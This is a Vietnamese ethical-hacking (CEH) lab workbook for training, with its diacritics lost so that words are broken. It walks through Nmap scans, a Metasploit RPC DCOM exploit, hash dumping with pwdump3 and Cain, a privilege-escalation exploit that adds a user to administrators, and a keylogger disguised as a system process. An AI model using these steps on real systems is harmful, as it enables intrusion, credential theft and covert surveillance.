SinhVienIT.net---CEH Lab Book Tieng Viet Phan1

Gio trnh bi tp C|EH Ti liu dnh cho hc vin

VSIC Education Corporation Trang 1

Mc Lc Bi 1:..................................................................................................................................... 3 FOOTPRINTING ................................................................................................................ 3

I/ Gii thiu v Foot Print:............................................................................................... 3 II/ Cc bi thc hnh: ...................................................................................................... 3

Bi 1: Tm thng tin v Domain................................................................................... 3 Bi 2: Tm thng tin email ........................................................................................... 5

Bi 2:..................................................................................................................................... 7 SCANNING.......................................................................................................................... 7

I/ Gii thiu v Scanning: ............................................................................................... 7 II/ Cc Bi thc hnh....................................................................................................... 7

Bi thc hnh 1: S dng Phn mm Nmap.................................................................. 7 Bi thc hnh th 2: S dng phn mm Retina pht hin cc vulnerabilities v tn cng bng Metaesploit framework................................................................................ 13

Bi 3:................................................................................................................................... 18 SYSTEM HACKING......................................................................................................... 18

I/ Gii thiu System Hacking:....................................................................................... 18 II/ Thc hnh cc bi Lab ............................................................................................. 18

Bi 1: Crack password nt b ni b........................................................................ 18 Bi 2: S dng chng trnh pwdump3v2 khi c c 1 user administrator ca my nn nhn c th tm c thng tin cc user cn li. ................................... 20 Bi Lab 3: Nng quyn thng qua chng trnh Kaspersky Lab ............................ 23 Bi Lab 4: S dng Keylogger................................................................................... 25 Bi Lab 5: S dng Rootkit v xa Log file .............................................................. 27

Bi 4:................................................................................................................................... 30 TROJAN v BACKDOOR ................................................................................................ 30

I/ Gii thiu v Trojan v Backdoor: ........................................................................... 30 II/ Cc bi thc hnh: .................................................................................................... 30

Bi 1 S dng netcat: ................................................................................................. 30 Bi 2: S dng Trojan Beast v detect trojan. .......................................................... 32 Mun s dng Trojan Beast, ta cn phi xy dng 1 file Server ci ln my nn nhn, sau file server ny s lng nghe nhng port c nh v t my tn cng ta s connect vo my nn nhn thng qua cng ny. ........................................................................ 32 Bi 3: S dng Trojan di dng Webbase .............................................................. 35

Bi 5:................................................................................................................................... 38 CC PHNG PHP SNIFFER ..................................................................................... 38

I/ Gii thiu v Sniffer .................................................................................................. 38 Bi 6:................................................................................................................................... 65 Tn Cng t chi dch v DoS........................................................................................... 65

I/ Gii thiu: .................................................................................................................. 65 II/ M t bi lab: ............................................................................................................ 67

Bi Lab 1: DoS bng cch s dng Ping of death. ................................................... 67 Bi lab 2: DoS 1 giao thc khng s dng chng thc(trong bi s dng giao thc RIP)............................................................................................................................. 69 Bi Lab 3: S dng flash DDoS ............................................................................ 72

Bi 7:................................................................................................................................... 74 Social Engineering ............................................................................................................. 74

I/ Gii Thiu .................................................................................................................. 74



II/ Cc bi Lab: .............................................................................................................. 74 Bi Lab 1: Gi email nc nh km Trojan .............................................................. 74

Bi 8:................................................................................................................................... 77 Session Hijacking ............................................................................................................... 77

I/ Gii thiu: ................................................................................................................... 77 II/ Thc hin bi Lab........................................................................................................ 77

Bi 9:................................................................................................................................... 80 Hacking Web Server .......................................................................................................... 80

I/ Gii thiu: ................................................................................................................... 80 II/ Thc Hin bi lab. ....................................................................................................... 80

Bi Lab 1: Tn cng Web Server Win 2003(li Apache) .......................................... 80 Bi lab 2: Khai thc li ng dng Server U ............................................................. 84

Bi 10:................................................................................................................................. 85 WEB APPLICATION HACKING.................................................................................... 85

I/ Gii thiu: .................................................................................................................. 85 II/ Cc Bi Lab ............................................................................................................... 85

Bi Lab 1: Cross Site Scripting.................................................................................. 85 Bi Lab 2: Insufficient Data Validation .................................................................... 86 Bi Lab 3: Cookie Manipulation ............................................................................... 88 Bi Lab 4: Authorization Failure .............................................................................. 89

Bi 11:................................................................................................................................. 91 SQL INJECTION .............................................................................................................. 91

I/ Gii thiu v SQL Injection: ...................................................................................... 91 II/ Thc Hnh Bi Lab .................................................................................................. 94

Bi 12:............................................................................................................................... 101 WIRELESS HACKING .................................................................................................. 101

I/ Gii Thiu ................................................................................................................. 101 II/ Thc hnh bi Lab: ................................................................................................ 101

Bi 13:............................................................................................................................... 105 VIRUS .............................................................................................................................. 105

I/ Gii thiu: (tham kho bi c thm) ..................................................................... 105 II/ Thc hnh Lab: ...................................................................................................... 105

Bi 1: Virus ph hy d liu my ............................................................................ 105 Bi 2: Virus gaixinh ly qua tin nhn. ..................................................................... 107

Bi 14:............................................................................................................................... 111 BUFFER OVERFLOW ................................................................................................... 111

I/ L thuyt .................................................................................................................. 111 II/ Thc hnh: .............................................................................................................. 118



Bi 1:

FOOTPRINTING

I/ Gii thiu v Foot Print: y l k thut gip hacker tm kim thng tin v 1 doanh nghip, c nhn hay t chc. Bn c th iu tra c rt nhiu thng tin ca mc tiu nh vo k thut ny. V d trong phn thc hnh th 1 chng ta p dng k thut ny tm kim thng tin v mt domain(v d l www.itvietnam.com) v xem th email lin lc ca domain ny l ca ai, trong phn thc hnh th 2 chng ta truy tm 1 danh sch cc email ca 1 keywork cho trc, phng php ny hiu qu cho cc doanh nghip mun s dng marketing thng qua hnh thc email v.v. Trong giai don ny Hacker c gng tm cng nhiu thng tin v doanh nghip(thng qua cc knh internet v phone) v c nhn(thng qua email v hot ng ca c nhn trn Internet), nu thc hin tt bc ny Hacker c th xc nh c nn tn cng vo im yu no ca chng ta. V d mun tn cng domain www.itvietnam.com th Hacker phi bit c a ch email no l ch ca domain ny v tm cch ly password ca email thng qua tn cng mail Server hay sniffer trong mng ni b v.v. V cui cng ly c Domain ny thng qua email ch ny. II/ Cc bi thc hnh: Bi 1: Tm thng tin v Domain Ta vo trang www.whois.net tm kim thng tin v nh vo domain mnh mun tm kim thng tin

Sau ta nhn c thng tin nh sau:



Registrar Name....: BlueHost.Com Registrar Whois...: whois.bluehost.com Registrar Homepage: http://www.bluehost.com/ Domain Name: ITVIETNAM.COM Created on..............: 1999-11-23 11:31:30 GMT Expires on..............: 2009-11-23 00:00:00 GMT Last modified on........: 2007-07-30 03:15:11 GMT Registrant Info: (FAST-12836461) VSIC Education Corporation VSIC Education Corporation 78-80 Nguyen Trai Street, 5 District, HCM City, 70000 Vietnam Phone: +84.88363691 Fax..: Email: [email protected] Last modified: 2007-03-23 04:12:24 GMT Administrative Info: (FAST-12836461) VSIC Education Corporation VSIC Education Corporation 78-80 Nguyen Trai Street, 5 District, HCM City, 70000 Vietnam Phone: +84.88363691 Fax..: Email: [email protected] Last modified: 2007-03-23 04:12:24 GMT Technical Info: (FAST-12785240) Attn: itvietnam.com C/O BlueHost.Com Domain Privacy 1215 North Research Way Suite #Q 3500 Orem, Utah 84097 United States Phone: +1.8017659400 Fax..: +1.8017651992 Email: [email protected]



Last modified: 2007-04-05 16:50:56 GMT Status: Locked

Ngoi vic tm thng tin v domain nh trn, chng ta c th s dng cc tin ch Reverse IP domain lookup c th xem th trn IP ca mnh c bao nhiu host chung vi mnh. Vo link sau y s dng tin ch ny.

http://www.domaintools.com/reverse-ip/

Vic tm kim c thng tin ny rt cn thit vi Hacker, bi v da vo thng tin s dng chung Server ny, Hacker c th thng qua cc Website b li trong danh sch trn v tn cng vo Server t kim sot tt c cc Website c hosting trn Server. Bi 2: Tm thng tin email Trong bi thc hnh ny, chng ta s dng phn mm 1st email address spider tm kim thng tin v cc email. Hacker c th s dng phn mm ny thu thp thm thng tin v mail, hay lc ra cc i tng email khc nhau, tuy nhin bn c th s dng tool ny thu thp thm thng tin nhm mc ch marketing, v d bn cn tm thng tin ca cc email c ui l @vnn.vn hay @hcm.vnn.vn phc cho vic marketing sn phm. Ta c th cu hnh vic s dng trang web no ly thng tin, trong bi ti s dng trang google.com tm kim.



Sau nh t kha vnn.vn vo tag keyword

Sau chng ta c c 1 list mail nh s dng trng trnh ny.



Bi 2: SCANNING

I/ Gii thiu v Scanning: Scanning hay cn gi l qut mng l bc khng th thiu c trong qu trnh tn

cng vo h thng mng ca hacker. Nu lm bc ny tt Hacker s mau chng pht hin c li ca h thng v d nh li RPC ca Window hay li trn phm mm dch v web nh Apache v.v. V t nhng li ny, hacker c th s dng nhng on m c hi(t cc trang web) tn cng vo h thng, ti t nht ly shell.

Phn mm scanning c rt nhiu loi, gm cc phm mm thng mi nh Retina, GFI, v cc phn mm min ph nh Nmap,Nessus. Thng thng cc n bn thng mi c th update cc bug li mi t internet v c th d tm c nhng li mi hn. Cc phn mm scanning c th gip ngi qun tr tm c li ca h thng, ng thi a ra cc gii php sa li nh update Service patch hay s dng cc policy hp l hn. II/ Cc Bi thc hnh Bi thc hnh 1: S dng Phn mm Nmap Trc khi thc hnh bi ny, hc vin nn tham kho li gio trnh l thuyt v cc option ca nmap. Chng ta c th s dng phn mm trong CD CEH v5, hay c th download bn mi nht t website: www.insecure.org. Phn mm nmap c 2 phin bn dnh cho Win v dnh cho Linux, trong bi thc hnh v Nmap, chng ta s dng bn dnh cho Window. thc hnh bi ny, hc vin nn s dng Vmware v boot t nhiu h iu hnh khc nhau nh Win XP sp2, Win 2003 sp1, Linux Fedora Core, Win 2000 sp4,v.v. Trc tin s dng Nmap do thm th xem trong subnet c host no up v cc port cc host ny m, ta s dng lnh Nmap h xem li cc option ca Nmap, sau thc hin lnh Nmap sS 10.100.100.1-20. V sau c kt qu sau: C:\Documents and Settings\anhhao>nmap -sS 10.100.100.1-20 Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 10:27 Pacific Standard Time Interesting ports on 10.100.100.1: Not shown: 1695 closed ports PORT STATE SERVICE 22/tcp open ssh 111/tcp open rpcbind MAC Address: 00:0C:29:09:ED:10 (VMware) Interesting ports on 10.100.100.6: Not shown: 1678 closed ports PORT STATE SERVICE



7/tcp open echo 9/tcp open discard 13/tcp open daytime 17/tcp open qotd 19/tcp open chargen 23/tcp open telnet 42/tcp open nameserver 53/tcp open domain 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 1026/tcp open LSA-or-nterm 1027/tcp open IIS 1030/tcp open iad1 2105/tcp open eklogin 3389/tcp open ms-term-serv 8080/tcp open http-proxy MAC Address: 00:0C:29:59:97:A2 (VMware) Interesting ports on 10.100.100.7: Not shown: 1693 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS MAC Address: 00:0C:29:95:A9:03 (VMware) Interesting ports on 10.100.100.11: Not shown: 1695 filtered ports PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 00:0C:29:A6:2E:31 (VMware) Skipping SYN Stealth Scan against 10.100.100.13 because Windows does not support scanning your own machine (localhost) this way. All 0 scanned ports on 10.100.100.13 are



Interesting ports on 10.100.100.16: Not shown: 1689 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 1433/tcp open ms-sql-s MAC Address: 00:0C:29:D6:73:6D (VMware) Interesting ports on 10.100.100.20: Not shown: 1693 closed ports PORT STATE SERVICE 135/tcp open msrpc 445/tcp open microsoft-ds 1000/tcp open cadlock 5101/tcp open admdog MAC Address: 00:15:C5:65:E3:85 (Dell) Nmap finished: 20 IP addresses (7 hosts up) scanned in 21.515 seconds Trong mng c tt c 7 host, 6 my Vmware v 1 PC DELL. By gi bc tip theo ta tm kim thng tin v OS ca cc Host trn bng s dng lnh Nmap v -O ip address . C:\Documents and Settings\anhhao>nmap -vv -O 10.100.100.7 (xem chi tit Nmap qut) Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 10:46 Pacific Standard Time Initiating ARP Ping Scan at 10:46 Scanning 10.100.100.7 [1 port] Completed ARP Ping Scan at 10:46, 0.22s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 10:46 Completed Parallel DNS resolution of 1 host. at 10:46, 0.01s elapsed Initiating SYN Stealth Scan at 10:46 Scanning 10.100.100.7 [1697 ports] Discovered open port 1025/tcp on 10.100.100.7 Discovered open port 445/tcp on 10.100.100.7 Discovered open port 135/tcp on 10.100.100.7 Discovered open port 139/tcp on 10.100.100.7



Completed SYN Stealth Scan at 10:46, 1.56s elapsed (1697 total ports) Initiating OS detection (try #1) against 10.100.100.7 Host 10.100.100.7 appears to be up ... good. Interesting ports on 10.100.100.7: Not shown: 1693 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS MAC Address: 00:0C:29:95:A9:03 (VMware) Device type: general purpose Running: Microsoft Windows 2003 OS details: Microsoft Windows 2003 Server SP1 OS Fingerprint: OS:SCAN(V=4.20%D=8/2%OT=135%CT=1%CU=36092%PV=Y%DS=1%G=Y%M=000C29%TM=46B2187 OS:3%P=i686-pc-windows-windows)SEQ(SP=FF%GCD=1%ISR=10A%TI=I%II=I%SS=S%TS=0) OS:OPS(O1=M5B4NW0NNT00NNS%O2=M5B4NW0NNT00NNS%O3=M5B4NW0NNT00%O4=M5B4NW0NNT0 OS:0NNS%O5=M5B4NW0NNT00NNS%O6=M5B4NNT00NNS)WIN(W1=FAF0%W2=FAF0%W3=FAF0%W4=F OS:AF0%W5=FAF0%W6=FAF0)ECN(R=Y%DF=N%T=80%W=FAF0%O=M5B4NW0NNS%CC=N%Q=)T1(R=Y OS:%DF=N%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=N%T=80%W=0%S=Z%A=S%F=AR%O=%RD OS:=0%Q=)T3(R=Y%DF=N%T=80%W=FAF0%S=O%A=S+%F=AS%O=M5B4NW0NNT00NNS%RD=0%Q=)T4 OS:(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=80%W=0%S=Z%A=S+% OS:F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=N% OS:T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%TOS=0%IPL=B0%UN=0%RIP OS:L=G%RID=G%RIPCK=G%RUCK=G%RUL=G%RUD=G)IE(R=Y%DFI=S%T=80%TOSI=Z%CD=Z%SI=S% OS:DLI=S) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=255 (Good luck!) IPID Sequence Generation: Incremental



OS detection performed. Please report any incorrect results at http://insecure.o rg/nmap/submit/ . Nmap finished: 1 IP address (1 host up) scanned in 3.204 seconds Raw packets sent: 1767 (78.460KB) | Rcvd: 1714 (79.328KB) Ta c th xem cc figerprinting ti C:\Program Files\Nmap\nmap-os-fingerprints

Tip tc vi nhng my cn li. C:\Documents and Settings\anhhao>nmap -O 10.100.100.1 Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 10:54 Pacific Standard Time Interesting ports on 10.100.100.1: Not shown: 1695 closed ports PORT STATE SERVICE 22/tcp open ssh 111/tcp open rpcbind MAC Address: 00:0C:29:09:ED:10 (VMware) Device type: general purpose Running: Linux 2.6.X OS details: Linux 2.6.9 - 2.6.12 (x86) Uptime: 0.056 days (since Thu Aug 02 09:34:08 2007) Network Distance: 1 hop



OS detection performed. Please report any incorrect results at http://insecure.o rg/nmap/submit/ . Nmap finished: 1 IP address (1 host up) scanned in 2.781 seconds Tuy nhin c 1 s host Nmap khng th nhn din ra nh sau: C:\Documents and Settings\anhhao>nmap -O 10.100.100.16 Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 10:55 Pacific Standard Time Interesting ports on 10.100.100.16: Not shown: 1689 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 1433/tcp open ms-sql-s MAC Address: 00:0C:29:D6:73:6D (VMware) No exact OS matches for host (If you know what OS is running on it, see http://i nsecure.org/nmap/submit/ ). TCP/IP fingerprint: OS:SCAN(V=4.20%D=8/2%OT=21%CT=1%CU=35147%PV=Y%DS=1%G=Y%M=000C29%TM=46B21A94 OS:%P=i686-pc-windows-windows)SEQ(SP=FD%GCD=2%ISR=10C%TI=I%II=I%SS=S%TS=0)S OS:EQ(SP=FD%GCD=1%ISR=10C%TI=I%II=I%SS=S%TS=0)OPS(O1=M5B4NW0NNT00NNS%O2=M5B OS:4NW0NNT00NNS%O3=M5B4NW0NNT00%O4=M5B4NW0NNT00NNS%O5=M5B4NW0NNT00NNS%O6=M5 OS:B4NNT00NNS)WIN(W1=FAF0%W2=FAF0%W3=FAF0%W4=FAF0%W5=FAF0%W6=FAF0)ECN(R=Y%D OS:F=Y%T=80%W=FAF0%O=M5B4NW0NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0 OS:%Q=)T2(R=Y%DF=N%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=FAF0 OS:%S=O%A=S+%F=AS%O=M5B4NW0NNT00NNS%RD=0%Q=)T4(R=Y%DF=N%T=80%W=0%S=A%A=O%F=



OS:R%O=%RD=0%Q=)T5(R=Y%DF=N%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T OS:=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=N%T=80%W=0%S=Z%A=S+%F=AR%O=%RD= OS:0%Q=)U1(R=Y%DF=N%T=80%TOS=0%IPL=38%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUL= OS:G%RUD=G)IE(R=Y%DFI=S%T=80%TOSI=S%CD=Z%SI=S%DLI=S) Network Distance: 1 hop OS detection performed. Please report any incorrect results at http://insecure.o rg/nmap/submit/ . Nmap finished: 1 IP address (1 host up) scanned in 12.485 seconds

Tuy nhin ta c th nhn din rng y l 1 Server chy dch v SQL v Web Server, by gi ta s dng lnh Nmap v p 80 sV 10.100.100.16 xc nh version ca IIS. C:\Documents and Settings\anhhao>nmap -p 80 -sV 10.100.100.16 Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 11:01 Pacific Standard Time Interesting ports on 10.100.100.16: PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS webserver 5.0 MAC Address: 00:0C:29:D6:73:6D (VMware) Service Info: OS: Windows Service detection performed. Please report any incorrect results at http://insec ure.org/nmap/submit/ . Nmap finished: 1 IP address (1 host up) scanned in 6.750 seconds

Vy ta c th on c phn nhiu host l Window 2000 Server. Ngoi vic thc hnh trn chng ta c th s dng Nmap trace, lu log v.v Bi thc hnh th 2: S dng phn mm Retina pht hin cc vulnerabilities v tn cng bng Metaesploit framework. Retina ca Ieye l phn mm thng mi(cng nh GFI, shadow v.v ) c th update cc l hng 1 cch thng xuyn v gip cho ngi Admin h thng c th a ra nhng gii php x l. By gi ta s dng phn mm Retina d tm li ca my Win 2003 Sp0(10.100.100.6)



Report t chng trnh Retina: TOP 20 VULNERABILITIES The following is an overview of the top 20 vulnerabilities on your network.

Rank Vulnerability Name Count

1. echo service 1

2. ASN.1 Vulnerability Could Allow Code Execution 1

3. Windows Cumulative Patch 835732 Remote 1

4. Null Session 1

5. No Remote Registry Access Available 1

6. telnet service 1

7. DCOM Enabled 1

8. Windows RPC Cumulative Patch 828741 Remote 1

9. Windows RPC DCOM interface buffer overflow 1

10. Windows RPC DCOM multiple vulnerabilities 1

11. Apache 1.3.27 0x1A Character Logging DoS 1



TOP 20 OPEN PORTS The following is an overview of the top 20 open ports on your network.

TOP 20 OPERATING SYSTEMS The following is an overview of the top 20 operating systems on your network.

12. Apache 1.3.27 HTDigest Command Execution 1

13. Apache mod_alias and mod_rewrite Buffer Overflow 1

14. ApacheBench multiple buffer overflows 1

15. HTTP TRACE method supported 1

Rank Port Number Description Count

1. TCP:7 ECHO - Echo 1

2. TCP:9 DISCARD - Discard 1

3. TCP:13 DAYTIME - Daytime 1

4. TCP:17 QOTD - Quote of the Day 1

5. TCP:19 CHARGEN - Character Generator 1

6. TCP:23 TELNET - Telnet 1

7. TCP:42 NAMESERVER / WINS - Host Name Server 1

8. TCP:53 DOMAIN - Domain Name Server 1

9. TCP:80 WWW-HTTP - World Wide Web HTTP (Hyper Text Transfer Protocol) 1

10. TCP:135 RPC-LOCATOR - RPC (Remote Procedure Call) Location Service 1

11. TCP:139 NETBIOS-SSN - NETBIOS Session Service 1

12. TCP:445 MICROSOFT-DS - Microsoft-DS 1

13. TCP:1025 LISTEN - listen 1

14. TCP:1026 NTERM - nterm 1

15. TCP:1030 IAD1 - BBN IAD 1

16. TCP:2103 ZEPHYR-CLT - Zephyr Serv-HM Conncetion 1

17. TCP:2105 EKLOGIN - Kerberos (v4) Encrypted RLogin 1

18. TCP:3389 MS RDP (Remote Desktop Protocol) / Terminal Services 1

19. TCP:8080 Generic - Shared service port 1

20. UDP:7 ECHO - Echo 1



Nh vy ta xc nh h iu hnh ca my 10.100.100.6, cc Port m ca h thng v cc li ca h thng. y l thng tin cn thit ngi Admin nhn din li v v li Trong Top 20 vulnerabilities ta s khai thc bug li th 10 l RPC DCOM bng chng trinh Metaesploit framework(CD CEH v5). Ta c th kim tra cc thng tin li ny trn chnh trang ca Ieye hay securityfocus.com, microsoft.com. Ta s dng giao din console ca Metaesploit tm bug li hp vi chng trnh Retina va qut c.

Rank Operating System Name Count

1. Windows Server 2003 1



Ta thy c th nhn thy bug li msrpc_dcom_ms03_026.pm c lit k trong phn exploit ca metaesploit. By gi ta bt u khai thc li ny.

Nh vy sau khi khai thc ta c c shell ca my Win 2003, by gi ta c th upload backdoor hay ly nhng thng tin cn thit trong my ny(vn ny s c bn nhng chng sau). Kt lun: Phn mm scanning rt quan trng vi Hacker c th pht hin li ca h thng, sau khi xc nh li Hacker c th s dng Framework c sn hay code c sn trn Internet c th chim quyn s dng ca my mc tiu. Tuy nhin y cng l cng c hu ch ca Admin h thng, phn mm ny gip cho ngi Admin h thng nh gi li mc bo mt ca h thng mnh v kim tra lin tc cc bug li xy ra.



Bi 3: SYSTEM HACKING

I/ Gii thiu System Hacking: Nh chng ta hc phn l thuyt, Module System Hacking bao gm nhng k thut ly Username v Password, nng quyn trong h thng, s dng keyloger ly thng tin ca i phng(trong bc ny cng c th Hacker li Trojan, vn hc chng tip theo), n thng tin ca process ang hot ng(Rootkit), v xa nhng log h thng. i vi phn ly thng tin v username v password Local, hacker c th crack pass trn my ni b nu s dng phn mm ci ln my , hay s dng CD boot Knoppix ly syskey, bc tip theo l gii m SAM ly hash ca Account h thng. Chng ta c th ly username v password thng qua remote nh SMB, NTLM(bng k thut sniffer s hc chng sau) hay thng qua 1 Account ca h thng bit(s dng PWdump3) Vi phn nng quyn trong h thng, Hacker c th s dng l hng ca Window, cc phn mm chy trn h thng nhm ly quyn Admin iu khin h thng. Trong bi thc hnh ta khai thc l hng ca Kaberky Lab 6.0 nng quyn t user bnh thng sang user Administrator trong Win XP sp2. Phn Keylogger ta s dng SC-keyloger xem cc hot ng ca nn nhn nh gim st ni dung bn phm, thng tin v chat, thng tin v s dng my, thng tin v cc ti khon user s dng. Tip theo ta s dng Rootkit n cc process ca keyloger, lm cho ngi admin h thng khng th pht hin ra l mnh ang b theo di. bc ny ta s dng vanquis rootkit n cc process trong h thng. Cui cng ta xa log v du vt xm nhp h thng. II/ Thc hnh cc bi Lab Bi 1: Crack password nt b ni b



Trc tin ta ci phm mm Cain vo my i phng, v s dng phn mm ny d tm password ca user. Qu trnh Add user

Bt phm mm Cain v chn Import Hashes from local system

y chng ta thy c 3 ch , Import hash from local system, ta s dng file SAM ca h thng hin ti ly hash ca account(khng c m ha syskey), Option Import Hashes from text file, thng thng text file ny l ly t Pwdump(lu hash ca account h thng di dng khng b m ha), Option th 3 l khi chng ta c syskey v file SAM b m ha bi syskey. Ca ba trng hp nu nhp y thng tin chng ta u c th c hash ca account khng b m ha bi syskey. Da vo thng tin hash ny phn mm s brute force tm kim password ca account. Trong bi ta chn user haovsic, v chn Brute force theo NTLM hash. Sau khi chn ch ny ta thy PC bt u tnh ton v cho ra kt qu.



Bi 2: S dng chng trnh pwdump3v2 khi c c 1 user administrator ca my nn nhn c th tm c thng tin cc user cn li.



My ca nn nhn s dng Window 2003 sp0, v c sn user quyen password l cisco, by gi da vo account ny, ta c th tm thm thng tin ca nhng account khc trong my. Trc tin ta s dng pwdump3.exe xem cc tham s cn nhp vo. Sau s dng lnh pwdump3.exe 10.100.100.6 c;\hao2003sp0 quyen, v nhp vo password ca user quyen.

Ta m file hao2003sp0 xem trong thng tin. aaa:1015:NO PASSWORD*********************:NO PASSWORD*********************::: anhhao:1010:DCAF9F8B002C73A0AAD3B435B51404EE:A923FFCC9BE38EBF40A5782BBD9D5E18::: anhhao1:1011:DCAF9F8B002C73A0AAD3B435B51404EE:A923FFCC9BE38EBF40A5782BBD9D5E18::: anhhao2:1013:DCAF9F8B002C73A0AAD3B435B51404EE:A923FFCC9BE38EBF40A5782BBD9D5E18::: anhhaoceh:1019:B26C623F5254C6A311F64391B17C6CDE:98A2C048C77703D54BD0E88887EFD68E::: ASPNET:1006:7CACBCC121AC203CD8652FE65BEA4486:7D34A6E7504DFAF453D4213660AE7D35::: Guest:501:NO PASSWORD*********************:NO PASSWORD*********************::: hack:1022:CCF9155E3E7DB453AAD3B435B51404EE:3DBDE697D71690A769204BEB12283678::: hacker:1018:BCE739534EA4E445AAD3B435B51404EE:5E7599F673DF11D5C5C4D950F5BF0157::: hao123:1020:58F907D1C79C344DAAD3B435B51404EE:FD03071D41308B58B9DDBC6D5576D78D:::



haoceh:1016:B3FF8763A6B5CE26AAD3B435B51404EE:7AD94985F28454259BF2A03821FEC8DB::: hicehclass:1023:B2BEF1B1582C2DC0AAD3B435B51404EE:D6198C25F8420A93301A5792398CF94C::: IUSR_113-SSR3JKXGW3N:1003:449913C1CEC65E2A97074C07DBD2969F:9E6A4AF346F1A1F4833ABFA52ADA9462::: IWAM_113-SSR3JKXGW3N:1004:4431005ABF401D86F92DBAC26FDFD3B8:188AA6E0737F12D16D60F8B64F7AE1FA::: lylam:1012:EE94DC327C009996AAD3B435B51404EE:7A63FB0793A85C960A775497C9D738EE::: quyen:500:A00B9194BEDB81FEAAD3B435B51404EE:5C800F13A3CE86ED2540DD4E7331E9A2::: SUPPORT_388945a0:1001:NO PASSWORD*********************:F791B19C488F4260723561D4F484EA09::: tam:1014:NO PASSWORD*********************:NO PASSWORD*********************::: test:1017:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537::: vic123:1021:CCF9155E3E7DB453AAD3B435B51404EE:3DBDE697D71690A769204BEB12283678::: Ta thy thng tin user quyen c ID l 500, y l ID ca user administrator trong mng, v user Guest l 501. Ngoi thng tin trn, ta c thm thng tin v pash hash ca user, by gi ta s dng chng trnh Cain tm kim thng tin v password ca cc user khc.

S dng Brute Force Attack vi user hiclassceh v tm ra password l 1234a. Password ny ch c 5 k t v d dng b Brute Force, tuy nhin i vi nhng password l



stong password (password bao gm ch hoa v thng, k t, s, k t c bit) th s lu hn. Bi Lab 3: Nng quyn thng qua chng trnh Kaspersky Lab i vi vic nng quyn trong mt h thng hacker phi li dng l hng no , hoc l t h iu hnh, hoc l t nhng phn mm ca hng th 3, trong trng hp ny, chng ta nng quyn thng qua phn mm dit Virus l Kaspersky Lab. chun b bi lab ny, chng ta ln trang web www.milw0rm.com tm thng tin v on m khai thc ny.

Sau ta s dng on code ny bin dch thy file exe tn cng vo my nn nhn. thc hnh bi Lab, ta cn phi ci phn mm Kaspersky vo my. Sau khi ci xong ta thm vo my 1 user bnh thng,v tin hnh log on vo user ny, Trong bi ta s dng user hao v password l hao.



Chy file exe c bin dch exploit vo Kaspersky ang chy di quyn admin h thng.

S dng lnh telnet 127.0.0.1 8080 truy xut vo shell c quyn admin h thng. Ta tip tc s dng lnh Net Localgroup administrators hao /add add user hao vo nhm admin, v s dng lnh net user ti xc nhn Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. D:\WINDOWS\system32> D:\WINDOWS\system32>net Localgroup administrators hao /add net Localgroup administrators hao /add The command completed successfully. D:\WINDOWS\system32>net user hao net user hao User name hao Full Name Comment User's comment Country code 000 (System Default) Account active Yes Account expires Never Password last set 8/3/2007 1:47 PM Password expires 9/15/2007 12:35 PM Password changeable 8/3/2007 1:47 PM Password required Yes



User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 8/3/2007 1:54 PM Logon hours allowed All Local Group Memberships *Administrators *Users Global Group memberships *None The command completed successfully. D:\WINDOWS\system32> Ta thy user hao by gi c quyn Admin trong h thng, v vic nng quyn thnh cng. Cc bn c th test nhng phn mm tng t t code down t trang www.milw0rm.com. Bi Lab 4: S dng Keylogger Trong bi lab ny, ta s dng phn mm SC Keylogger thu thp thng tin t my ca nn nhn, vic phi lm phi to ra file keylog, chn mail server relay, ci vo nn nhn. Sau khi ci phn mm ti file keylogger, by gi ta bt u cu hnh cho sn phm keylogger ca mnh. u tin ta chn hnh ng c ghi log file bao gm ghi keyboard, Mouse, v chng trnh chy.



Tip theo ta chn thng tin email m my nn nhn s gi logfile ny. Thng tin ny c gi 10 pht 1 ln.

Tip theo ta cu hnh mail server relay, v thng tin v process hin th, phn ny hacker thng thng s dng nhng tn ging vi nhng service c sn trn Window nh svchost.exe,csrss.exev.v nh la ngi admin. d nhn dng ta chn tn file l cehkeylogger.

Sau khi to xong keylogger, ta chy n trn my nn nhn. Ta chn 1 my Win XP no chy chng trnh ny v gi s sau nh on text sau:



